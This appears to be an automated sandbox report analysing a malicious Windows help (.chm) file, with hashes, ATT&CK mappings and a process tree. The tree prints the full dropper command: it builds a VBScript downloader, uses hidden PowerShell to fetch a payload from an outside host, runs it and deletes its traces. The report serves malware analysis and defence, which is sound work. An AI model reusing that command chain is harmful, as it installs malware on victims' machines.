c9385f9be9ce63aada94ced7076bada0b3b46ac3ceef3d55f09d9330a1f07b7b

Analysis

max time kernel
121s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
22-01-2025 03:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c9385f9be9ce63aada94ced7076bada0b3b46ac3ceef3d55f09d9330a1f07b7b.chm
Size

75KB
MD5

be84e4cc5be9f94fa761fc67afa8fe80
SHA1

7d3ef8e6e17a398631896d46458ba6c35f6467da
SHA256

c9385f9be9ce63aada94ced7076bada0b3b46ac3ceef3d55f09d9330a1f07b7b
SHA512

87be82fc1488af34b4eb868ad0628c642259358f229a8370bed02ea27efdccec9ed3def768c17627c3a7cc3cbb447e06e7fa8c565a246244bad2d97d3267bce0
SSDEEP

1536:skQ/2F/Efsls403Pacb99MdsTEnmmqdHB3fmMwIUGlGgOtrI7mI:nQelsVyu5sYb3VOS7mI

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2452	powershell.exe
2704	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2876	ript.exe
536	x.exe

Loads dropped DLL 4 IoCs

pid	Process
2452	powershell.exe
2452	powershell.exe
2452	powershell.exe
2452	powershell.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
2944	cmd.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
1624	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	hh.exe

Modifies system certificate store 2 TTPs 2 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	ript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	ript.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
536	x.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2452	powershell.exe
2704	powershell.exe
2704	powershell.exe
2704	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	1624	taskkill.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2528	hh.exe
2528	hh.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2528 wrote to memory of 2944	2528	hh.exe	30
PID 2528 wrote to memory of 2944	2528	hh.exe	30
PID 2528 wrote to memory of 2944	2528	hh.exe	30
PID 2944 wrote to memory of 2436	2944	cmd.exe	32
PID 2944 wrote to memory of 2436	2944	cmd.exe	32
PID 2944 wrote to memory of 2436	2944	cmd.exe	32
PID 2944 wrote to memory of 2452	2944	cmd.exe	33
PID 2944 wrote to memory of 2452	2944	cmd.exe	33
PID 2944 wrote to memory of 2452	2944	cmd.exe	33
PID 2452 wrote to memory of 2876	2452	powershell.exe	34
PID 2452 wrote to memory of 2876	2452	powershell.exe	34
PID 2452 wrote to memory of 2876	2452	powershell.exe	34
PID 2944 wrote to memory of 2704	2944	cmd.exe	36
PID 2944 wrote to memory of 2704	2944	cmd.exe	36
PID 2944 wrote to memory of 2704	2944	cmd.exe	36
PID 2704 wrote to memory of 1652	2704	powershell.exe	37
PID 2704 wrote to memory of 1652	2704	powershell.exe	37
PID 2704 wrote to memory of 1652	2704	powershell.exe	37
PID 1652 wrote to memory of 2936	1652	cmd.exe	39
PID 1652 wrote to memory of 2936	1652	cmd.exe	39
PID 1652 wrote to memory of 2936	1652	cmd.exe	39
PID 2944 wrote to memory of 1624	2944	cmd.exe	40
PID 2944 wrote to memory of 1624	2944	cmd.exe	40
PID 2944 wrote to memory of 1624	2944	cmd.exe	40
PID 1652 wrote to memory of 536	1652	cmd.exe	41
PID 1652 wrote to memory of 536	1652	cmd.exe	41
PID 1652 wrote to memory of 536	1652	cmd.exe	41
PID 1652 wrote to memory of 536	1652	cmd.exe	41

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\c9385f9be9ce63aada94ced7076bada0b3b46ac3ceef3d55f09d9330a1f07b7b.chm
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2528
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
  2⤵
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:2944
- - C:\Windows\system32\extrac32.exe
    extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
    3⤵
    PID:2436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2452
  - - C:\Users\Public\ript.exe
      "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PS.cmd C:\\Users\\Public\\df.cmd
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      PID:2876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2704
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Public\df.cmd" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1652
    - - C:\Windows\system32\extrac32.exe
        
        extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        
        PID:2936
    - - C:\Users\Admin\AppData\Local\Temp\x.exe
        
        "C:\Users\Admin\AppData\Local\Temp\x.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:536
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM hh.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\x.exe

Filesize
1.3MB

MD5
17a9121dc62c2dd580cd374d7e132198

SHA1
959f44160fdfe3fc4917450158aa0c5764c0ee33

SHA256
8d104933a03d3d9427c9db1df8edc07b7ccc7e0739f0471a97263478ae0aebb8

SHA512
6a06eeb871eec22e960e62198502bed06e8d804b3d2c14c8a1f32ad91ee2acd92a82c8297f896f114806d4c4052b0e24c41f1336be5a27aa649d480b10899722

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
4798c961f0c8708397b281b3a67ef013

SHA1
44f3ea61dbb9d1303b810e26da23421d60cf4836

SHA256
901b633ce9e183a4e913843534ce44a483d17af4ebfb01600a8065ca0e75d56d

SHA512
22676395d94909426437e81bf3011ee2d760592c619304bdd761ed6eb7b1d6c2f0ecab27c00961badd6e4333cff1d11fc267dc3505f65a68582897c92c6b315c

Download Submit
C:\Users\Public\aloha.vbs

Filesize
194B

MD5
71efa4ec6c67fa5665b1d0c64d60fc25

SHA1
f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

SHA256
08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

SHA512
7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

Download Submit
C:\Users\Public\df.cmd

Filesize
1.3MB

MD5
bde4452bdba4bcc0a968e217717410e4

SHA1
f7d8b6bdacc1647c127df4017980e945f2476de4

SHA256
b96e72f0ade88aeed75d1d04df219887ed2f431ce6755c02ab504efa497460b1

SHA512
69419fb7c6815eb611d9ff725b0659eab2547bede4cd6e0c7d464f4f502585fd715b15243a6d025f2ddc81e51cf786635c6ba09e9c8b5fccef2e076e70d13fcd

Download Submit
C:\Users\Public\ript.exe

Filesize
152KB

MD5
791af7743252d0cd10a30d61e5bc1f8e

SHA1
70096a77e202cf9f30c064956f36d14bcbd8f7bb

SHA256
e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15

SHA512
d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb

Download Submit
memory/536-60-0x0000000000400000-0x000000000054C000-memory.dmp

Filesize
1.3MB

Download
memory/536-59-0x00000000033F0000-0x00000000043F0000-memory.dmp

Filesize
16.0MB

Download
memory/2452-21-0x000000001B690000-0x000000001B972000-memory.dmp

Filesize
2.9MB

Download
memory/2452-26-0x0000000002710000-0x0000000002718000-memory.dmp

Filesize
32KB

Download
memory/2704-51-0x000000001B510000-0x000000001B7F2000-memory.dmp

Filesize
2.9MB

Download
memory/2704-52-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download